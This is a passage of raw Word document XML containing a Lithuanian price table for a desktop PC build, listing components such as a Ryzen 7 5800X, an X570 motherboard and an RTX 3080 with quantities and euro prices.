        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2520"/>
        <w:gridCol w:w="5012"/>
        <w:gridCol w:w="886"/>
        <w:gridCol w:w="1495"/>
      </w:tblGrid>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="05A21329" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="49577348" w14:textId="66834493" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Prekės pavadinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="04520266" w14:textId="21C03B97" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Prekės modelis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="58C2AAAA" w14:textId="1495E088" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vnt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3E75906A" w14:textId="4FC59D4F" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Kaina 1 vnt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="29D97022" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="681A27B4" w14:textId="08057D14" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Procesorius</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="35C363F7" w14:textId="16C1D158" w:rsidR="41B91153" w:rsidRPr="005A5C28" w:rsidRDefault="41B91153" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>AMD Ryzen™ 7 5800X 8C/16T socket AM4, 3.8-4.7GHz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5950D40E" w14:textId="243F13CC" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="63CA8919" w14:textId="2CE60F2F" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="36432B68" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="15B1772C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="27B777E6" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidR="29D98044" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>0€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="184758C9" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="02042DE2" w14:textId="7083599C" w:rsidR="603E6830" w:rsidRPr="005A5C28" w:rsidRDefault="603E6830" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Aušintuvas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1F1B8F20" w14:textId="59A8FAB6" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="25CAE7A1" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Deepcool GAMMAXX GT A-RGB Cooler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="083D395C" w14:textId="3FBEE8E8" w:rsidR="25CAE7A1" w:rsidRPr="005A5C28" w:rsidRDefault="25CAE7A1" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38B44F82" w14:textId="5E64E38F" w:rsidR="25CAE7A1" w:rsidRPr="005A5C28" w:rsidRDefault="25CAE7A1" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>32,79€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="7AA5BC12" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="123A35D1" w14:textId="7EE76557" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Pagrindinė plokštė </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="17420481" w14:textId="59A8FAB6" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="0845B53D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>GIGABYTE X570 AORUS ULTR</w:t>
            </w:r>
            <w:r w:rsidR="377262B7" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="1B8CFA67" w14:textId="459AB5D7" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="693D044C" w14:textId="6BD6FC87" w:rsidR="6FDF9E29" w:rsidRPr="005A5C28" w:rsidRDefault="6FDF9E29" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>298</w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="0AC10297" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="29D98044" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>9 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="21D3C1F7" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="65ED5BDC" w14:textId="530F0F03" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Operatyvinė atmintis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="38CD373B" w14:textId="59A8FAB6" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t xml:space="preserve"> KINGSTON 16GB 3600MHz DDR4 CL17 DIMM Kit of 2 1Rx8 HyperX FURY Black</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6C871ABE" w14:textId="00F0D6C2" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="5C4A5573" w14:textId="6E1DFD52" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>79 €</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="22D0E82C" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="732EAB09" w14:textId="440C903B" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vaizdo plokštė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6F8C6592" w14:textId="59A8FAB6" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="67582037" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Inno3D Video Card GeForce RTX 3080 Twin X2 OC 10GB GDDR6 1725 320-bit 19Gbps 3xDP+HDMI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="785E7C66" w14:textId="5DDCD837" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:pStyle w:val="Heading1"/>
              <w:widowControl w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:b w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3D3E6E98" w14:textId="2E4E0D87" w:rsidR="12DBC02D" w:rsidRPr="005A5C28" w:rsidRDefault="12DBC02D" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>880</w:t>
            </w:r>
            <w:r w:rsidR="009D5F8C" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="29D98044" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>00€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="780542BE" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="53BCF00A" w14:textId="35548D3A" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Vidinis diskas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2528" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3C2CC5CF" w14:textId="59A8FAB6" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Samsung SSD 970 EVO NVMe M.2 PCIe 1TB, 3500/2500MB/s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="447" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="7C83F7CF" w14:textId="2054F297" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="754" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="71FE1630" w14:textId="36FF86EC" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>140</w:t>
            </w:r>
            <w:r w:rsidR="003D0977" w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>89€</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="53A6E647" w14:textId="77777777" w:rsidTr="001A5FFF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1271" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="154031EA" w14:textId="7C134B66" w:rsidR="29D98044" w:rsidRPr="005A5C28" w:rsidRDefault="29D98044" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
